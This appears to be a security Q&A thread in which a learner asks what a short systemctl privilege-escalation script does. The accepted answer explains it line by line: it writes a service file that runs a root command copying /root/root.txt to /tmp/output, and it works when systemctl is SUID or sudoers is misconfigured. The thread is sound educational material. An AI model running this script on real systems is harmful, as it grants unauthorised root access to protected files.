# What does the following lines of code mean? Can anyone explain step by step?

Tags: web-application, webserver, privilege-escalation

I'm still learning and this was a part of using systemctl for privilege escalation.

```
eop=$(mktemp).service

echo '[Service]

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

[Install]

WantedBy=multi-user.target' >$eop

/bin/systemctl link $eop

/bin/systemctl enable --now $eop
```

Comment: Step-by-step, this is just a bash script and it is easy to look up the commands. This isn't a security question. If you know what each command does and you have a specific question that pertains to security, feel free to ask that.

Answer (score 1, accepted):

This writes a `systemctl` service file to a temporary file then calls systemctl to start said service.

The privilege escalation comes in if `systemctl` has SUID (meaning it always runs as the user who owns `systemctl`, usually `root`), or if `sudoers` is badly configured. If that is the case, the demo service will copy the contents of `/root/root.txt` into `/tmp/output`.

Details of the code:

```
# Create a temporary file and save the path in the variable eop
eop=$(mktemp).service

# This write one big string to the file path stored in eop.
# This is a barebones service file for systemctl.
# Note the single quotes after echo and before >
echo '[Service]

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

[Install]

WantedBy=multi-user.target' >$eop

# Tell systemctl about the new service described in the file pointed to by eop
/bin/systemctl link $eop

# Enable the service and start it right now.
/bin/systemctl enable --now $eop
```